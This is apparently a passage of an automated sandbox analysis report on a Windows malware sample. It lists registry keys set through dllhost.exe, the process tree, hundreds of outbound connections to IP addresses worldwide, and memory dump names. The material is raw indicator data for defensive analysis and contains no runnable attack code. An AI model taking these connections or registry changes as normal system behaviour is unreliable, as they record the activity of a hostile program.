Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe N/A (2 identical rows)
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A (62 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe"

C:\Windows\SysWOW64\dllhost.exe

dllhost.exe

C:\Windows\SysWOW64\dllhost.exe

dllhost.exe

C:\Windows\SysWOW64\dllhost.exe

"C:\Windows\SysWOW64\dllhost.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4352 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 218.143.123.92.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
KR 223.63.61.30:80 tcp
US 9.180.11.105:80 tcp
US 50.19.246.254:80 tcp
US 8.8.8.8:53 254.246.19.50.in-addr.arpa udp
US 50.19.246.254:80 50.19.246.254 tcp
US 64.184.85.198:80 tcp
CN 101.74.51.52:80 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
CA 142.128.121.95:80 tcp
CN 112.126.243.25:80 tcp
US 50.90.76.3:80 tcp
AU 13.77.17.44:8080 tcp
US 173.24.114.64:80 tcp
TT 190.58.114.150:443 tcp
TW 140.96.39.103:80 tcp
FR 94.139.37.220:80 tcp
US 207.244.93.131:80 tcp
CN 36.105.182.97:80 tcp
RU 213.87.52.237:80 tcp
RU 213.189.241.231:80 tcp
TH 122.154.8.45:80 tcp
DE 85.16.121.59:80 tcp
N/A 100.76.101.66:80 tcp
JP 150.19.159.238:80 tcp
BG 109.121.158.2:443 tcp
FR 109.30.172.130:80 tcp
GR 80.106.150.98:80 tcp
FR 92.160.97.40:80 tcp
ES 213.94.23.202:80 tcp
CN 182.240.226.112:80 tcp
US 47.181.86.120:8080 tcp
MA 105.188.162.103:80 tcp
CO 186.83.152.127:80 tcp
DK 85.184.179.86:443 tcp
US 135.165.222.22:80 tcp
TR 176.238.20.171:80 tcp
SA 176.45.239.199:80 tcp
AU 167.30.15.168:80 tcp
DK 85.184.166.185:80 tcp
MX 201.164.135.9:80 tcp
PR 57.91.219.242:80 tcp
NL 137.174.230.254:80 tcp
US 32.118.204.129:80 tcp
JP 126.204.22.182:80 tcp
GB 140.228.48.134:80 tcp
US 208.4.122.26:80 tcp
ZA 105.4.86.84:80 tcp
CN 36.108.2.235:80 tcp
US 174.251.102.27:80 tcp
US 70.177.210.52:80 tcp
FR 128.93.171.129:80 tcp
DE 194.42.181.52:80 tcp
US 167.173.80.254:80 tcp
US 35.107.15.33:80 tcp
US 63.79.97.21:80 tcp
DE 136.172.206.51:80 tcp
SE 193.10.82.218:80 tcp
KR 124.57.172.67:8080 tcp
US 150.159.119.64:80 tcp
BE 109.139.244.151:80 tcp
US 52.111.2.132:80 tcp
DE 77.182.89.98:80 tcp
CA 75.156.61.124:80 tcp
GB 84.92.218.214:80 tcp
US 168.183.63.135:80 tcp
NL 82.72.153.23:80 tcp
US 8.8.8.8:53 135.63.183.168.in-addr.arpa udp
BR 179.168.203.241:80 tcp
US 35.110.251.19:80 tcp
US 170.97.12.92:8080 tcp
US 140.8.107.143:8080 tcp
US 174.87.212.178:80 tcp
US 57.162.149.224:80 tcp
US 26.152.135.179:80 tcp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
ID 120.165.73.79:80 tcp
TW 60.244.183.225:80 tcp
AE 83.110.218.107:80 tcp
US 130.175.220.185:80 tcp
DE 31.239.214.160:80 tcp
US 16.175.172.29:80 tcp
JP 122.219.80.106:80 tcp
US 108.185.71.19:443 tcp
NZ 47.72.93.219:80 tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 172.217.169.10:443 chromewebstore.googleapis.com tcp
ZA 41.16.222.164:8080 tcp
CN 106.86.86.179:80 tcp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 132.43.127.41:80 tcp
ZA 105.2.137.198:80 tcp
US 96.88.8.194:80 tcp
EG 62.135.19.61:80 tcp
US 63.36.141.36:80 tcp
IN 221.135.111.174:80 tcp
ZA 197.107.75.142:80 tcp
DE 139.29.212.30:80 tcp
GB 145.43.232.209:80 tcp
US 108.121.38.20:443 tcp
KR 112.187.216.186:80 tcp
DE 139.21.2.255:8080 tcp
US 35.173.241.198:8080 tcp
CN 106.39.49.85:80 tcp
DE 195.109.98.14:80 tcp
VE 167.134.59.221:80 tcp
FI 88.115.228.103:80 tcp
JP 103.167.42.224:80 tcp
BR 187.99.93.173:8080 tcp
US 107.184.230.180:80 tcp
US 163.2.145.136:80 tcp
US 138.149.254.226:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
CN 118.199.172.253:80 tcp
IE 52.16.96.162:80 tcp
US 29.37.111.253:80 tcp
US 54.84.249.93:80 tcp
JP 220.63.42.71:80 tcp
US 166.222.235.163:80 tcp
US 99.126.16.232:80 tcp
JP 153.161.100.172:80 tcp
IN 202.71.25.98:443 tcp
US 167.21.196.159:443 tcp
FR 92.183.105.193:80 tcp
CH 217.162.165.174:80 tcp
SI 193.2.23.230:80 tcp
JP 221.103.206.222:80 tcp
TW 118.232.138.233:80 tcp
US 52.55.248.220:80 tcp
CN 210.36.220.23:80 tcp
US 7.209.185.70:80 tcp
US 48.102.200.105:80 tcp
SE 130.240.67.149:80 tcp
JP 150.99.185.130:80 tcp
CN 119.185.12.241:443 tcp
US 207.28.128.25:80 tcp
IT 151.52.96.224:80 tcp
FR 193.108.216.121:80 tcp
US 159.236.98.30:80 tcp
CN 113.16.5.155:80 tcp
RU 46.160.61.91:80 tcp
US 209.57.223.123:80 tcp
US 50.138.224.228:443 tcp
CN 183.232.11.175:80 tcp
US 33.125.170.40:80 tcp
CN 222.31.218.10:80 tcp
BR 179.232.189.87:80 tcp
US 129.155.194.210:80 tcp
CN 183.187.23.221:80 tcp
US 184.113.211.65:80 tcp
US 215.161.242.172:80 tcp
US 150.231.166.54:80 tcp
NL 208.75.15.120:80 tcp
US 104.15.4.23:80 tcp
US 99.37.142.196:8080 tcp
US 72.238.206.126:80 tcp
US 161.57.19.201:443 tcp
BE 164.15.195.67:80 tcp
KR 125.150.153.175:80 tcp
US 149.58.152.71:80 tcp
US 38.8.131.143:80 tcp
US 50.164.88.177:80 tcp
JP 161.34.125.216:80 tcp
US 74.173.240.73:80 tcp
US 47.185.137.93:80 tcp
GB 141.97.70.199:80 tcp
US 21.230.24.30:80 tcp
JP 133.175.109.7:80 tcp
BR 152.234.169.221:80 tcp
BR 179.68.111.11:80 tcp
CN 118.188.226.226:8080 tcp
US 132.42.148.130:80 tcp
PT 89.214.67.16:80 tcp
US 159.172.160.215:80 tcp
CN 110.251.154.199:80 tcp
SA 37.107.70.165:80 tcp
CN 110.242.238.234:80 tcp
US 96.5.148.196:80 tcp
MX 148.208.107.175:80 tcp
FI 157.200.253.30:80 tcp
CN 119.166.220.2:80 tcp
JP 143.201.16.16:80 tcp
HK 43.250.190.239:80 tcp
AU 110.32.182.136:80 tcp
CH 57.4.191.133:80 tcp
US 8.8.8.8:53 239.190.250.43.in-addr.arpa udp
NZ 156.62.76.45:80 tcp
US 98.165.106.120:80 tcp
CN 175.150.83.235:80 tcp
GB 148.181.173.194:8080 tcp
SG 124.246.82.49:80 tcp
US 108.37.30.135:443 tcp
DE 109.250.61.161:80 tcp
N/A 100.110.246.6:80 tcp
DE 141.34.70.124:80 tcp
CN 110.155.94.254:80 tcp
MX 148.207.125.216:8080 tcp
ZA 41.145.61.165:443 tcp
RU 87.250.242.207:80 tcp
NO 2.149.46.172:80 tcp
US 129.22.128.20:80 tcp
US 169.251.121.154:80 tcp
RU 178.18.12.183:80 tcp
GB 146.31.80.106:80 tcp
KW 37.231.120.6:80 tcp
US 55.198.204.12:80 tcp
US 18.174.226.139:80 tcp
KR 175.119.224.152:443 tcp
US 146.9.72.6:80 tcp
N/A 10.220.226.49:80 tcp
FR 2.11.143.192:80 tcp
FI 164.5.16.207:80 tcp
CN 182.16.213.137:80 tcp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
GB 86.22.101.221:443 tcp
US 206.26.150.122:80 tcp
US 47.225.240.15:80 tcp
US 96.46.10.114:80 tcp
US 33.118.241.245:80 tcp
US 7.152.45.85:80 tcp
US 173.68.246.128:80 tcp
US 13.117.253.56:80 tcp
GE 37.232.78.125:80 tcp
AU 125.168.91.46:443 tcp
US 35.97.164.25:80 tcp
N/A 153.19.226.115:80 tcp

Files

memory/1380-1-0x0000000002230000-0x0000000002231000-memory.dmp

memory/1380-0-0x00000000025E0000-0x0000000002C31000-memory.dmp

memory/1380-2-0x0000000000400000-0x0000000000491000-memory.dmp

memory/1380-4-0x0000000000060000-0x0000000000124000-memory.dmp

memory/3720-6-0x00000000001A0000-0x00000000001A7000-memory.dmp

memory/3720-7-0x0000000001200000-0x00000000012C4000-memory.dmp

memory/1380-8-0x0000000000060000-0x0000000000124000-memory.dmp

memory/1380-9-0x0000000000400000-0x0000000000491000-memory.dmp

memory/1380-10-0x00000000025E0000-0x0000000002C31000-memory.dmp

memory/904-14-0x00000000001A0000-0x00000000001A7000-memory.dmp

memory/3720-11-0x0000000001200000-0x00000000012C4000-memory.dmp

memory/904-16-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-19-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-18-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-17-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-15-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-20-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-21-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-22-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-23-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-24-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-25-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/4672-26-0x00000000001A0000-0x00000000001A7000-memory.dmp

memory/4672-27-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-32-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-31-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-30-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-29-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-28-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/904-33-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-37-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-40-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-39-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-38-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-36-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-35-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-34-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-41-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/3576-42-0x0000000000AE0000-0x0000000000F13000-memory.dmp

memory/3576-43-0x0000000000AE0000-0x0000000000F13000-memory.dmp

memory/3576-45-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-48-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-47-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-46-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-44-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-50-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/904-60-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-63-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-68-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-67-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-66-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-65-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-64-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-62-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-61-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-59-0x0000000000C00000-0x0000000000CC4000-memory.dmp